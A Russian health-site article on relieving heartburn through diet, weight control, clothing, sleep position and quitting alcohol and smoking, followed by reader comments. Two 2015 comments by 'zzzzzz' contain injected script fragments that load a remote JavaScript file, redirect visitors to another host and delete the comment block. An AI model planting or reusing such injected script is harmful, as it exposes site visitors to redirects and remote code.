Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как избавиться от изжоги  >>  Как избавиться от изжоги
 
Обратная связь
 

Как избавиться от изжоги

Размер шрифта
27 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Виктория Ткаченко
Здоровье инфо
  • google_analytics: false
  • Нравится

Изжога, или на медицинском языке гастроэзофагеальная рефлюксная болезнь (ГЭРБ), – частый спутник нарушений работы пищеварительной системы. Как избавить себя от этого неприятного симптома?

изжога

Самый распространенный вид ее лечения – назначение лекарственных препаратов, хотя иногда необходимо хирургическое вмешательство. В любом случае при ГЭРБ полезно пересмотреть свои некоторые привычки и образ жизни, начиная от пищи и заканчивая тем, насколько удобную одежду вы носите.

Частые приемы пищи

Неправильный режим питания часто является причиной ГЭРБ. Например, очень полный желудок может вызывать нарушение работы сфинктера пищевода (клапана между пищеводом и желудком). Таким образом, содержимое желудка, включая желудочный сок, подталкивается обратно в пищевод.

Рекомендуется иметь несколько небольших приемов пищи в течение дня, а не питаться по стандартной схеме: завтрак, обед и ужин. Также не стоит наедаться на ночь или непосредственно перед сном.

Исключите некоторые продукты

Вызывать обострение симптомов ГЭРБ могут и некоторые компоненты блюд. В этот список входят пряные продукты, жирное красное мясо, картофель фри (и другие жареные продукты), цитрусовые, сырой лук, помидоры, сливочное масло, мята, шоколад и напитки с кофеином. 

Не употребляйте алкоголь

Алкоголь усиливает изжогу. Он вызывает расслабление нижнего пищеводного сфинктера, который, как уже было сказано, является «заслонкой» между пищеводом и желудком. В такой ситуации содержимое желудка движется обратно в пищевод.

Считается, что в целях предупреждения ГЭРБ алкоголь можно употреблять несколько раз в неделю в минимальных количествах.

Контролируйте вес

Лишний вес может способствовать появлению изжоги. Как показали результаты исследования ученых, есть прямая связь между симптомами ГЭРБ и повышенным индексом массы тела (ИМТ). Тучные люди почти в три раза чаще, чем люди с нормальным весом, страдают от изжоги и кислотного рефлюкса.

Носите удобную одежду

Тесная неудобная одежда может способствовать попаданию кислоты из желудка в пищевод. Конечно, узкие брюки неплохо выглядят, но стоят ли они того? Если вы страдаете ГЭРБ, носите более свободную и мягкую по текстуре одежду, не затягивайте туго ремни и пояса.

Поза во время сна

Ваша поза во время ночного отдыха тоже может стать причиной изжоги. Не ешьте перед сном и спите на подушке высотой 15-25 см. Приподнятое положение головы и шеи поможет не затекать кислоте из желудка в пищевод.

Бросайте курить

Всем известно, что курение повреждает сердце и легкие… но и пищеварительную систему тоже. Никотин, как и алкоголь, может ухудшить симптомы ГЭРБ, расслабляя нижний пищеводный сфинктер, что приведет к обратному току желудочной кислоты в пищевод.

Курение провоцирует попадание желчных кислот из тонкой кишки в желудок и уменьшение выработки слюны, которая помогает вымывать желудочную кислоту из пищевода и поддерживать нормальный кислотно-щелочной баланс.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 сентября 2012 в 16:57

Комментарий удален за нарушение Правил общения

2 - Мандаринка

12 октября 2012 в 13:43

Цитировать   |   Пожаловаться

На счёт исключения некоторых продуктов - солгасна. Изжога только и появляется от мучного теста и цитрусого сока. Это не может быть никакими намёками на какое-либо заболевание?

Мандаринка 12 октября 2012 в 13:43
Это не может быть никакими намёками на какое-либо заболевание?
 Может. За советом  - стоит посетить терапевта, сделать кое-какие анализы и обследоваться у гастроэнтеролога. 

4 - Гость

20 февраля 2013 в 13:18

Цитировать   |   Пожаловаться

Здравствуйте.

Меня зовут Людмила , 32 года, г. Тверь.  Третий год меня мучает рефлюкс-эзофагит, постоянно прохожу курсы лечения, но безуспешно. На фоне эзофагита развился хронический бронхит! Посоветуйте хорошего специалиста к которому можно обратиться с данной проблемой в Москве.

5 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

7 - Гость

24 мая 2016 в 10:08

Цитировать   |   Пожаловаться

Доброго времени суток. Меня зовут Елена. Действительно тема актуальная. У меня тоже иногда возникает изжога и подавляю ее с помощью раствора пищевой соды. Обычно помогает, но бывают случаи, что и нет. Решила порыться в инете и перед вами прочла http://megapoisk.com/kak-izbavitsja-ot-izzhogi-narodnye-sredstva полезную информацию, но решила поискать еще и вот нашла эту замечательную публикацию. Большое спасибо за содержательную и интересную статью, узнала много нового. Теперь если возникнет изжога я готова во всеоружии. Еще раз спасибо.

Статьи

       
Пищеварение у детей: что нужно знать родителям   Как избавиться от запаха изо рта   Видеокапсульная эндоскопия: ответы специалиста   Сколько нужно жевать  
23 июля 2012Обнаружена связь между сном и ожирением! 09 июня 2012Дети, проживающие в сельской местности, реже страдают аллергией
 
17 января 2012Поджелудочную вылечат с помощью нанотехнологий 26 декабря 2011Изжоги стало больше
 

Слайдшоу

1
Все, что нужно знать о желудке
Как обмануть желудок и похудеть?
Эффективные способы улучшения пищеварения

Тесты

1
Знаете ли вы, как работает ваш желудок?
Что вы знаете о поджелудочной железе?
Знаете ли вы свой язык
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.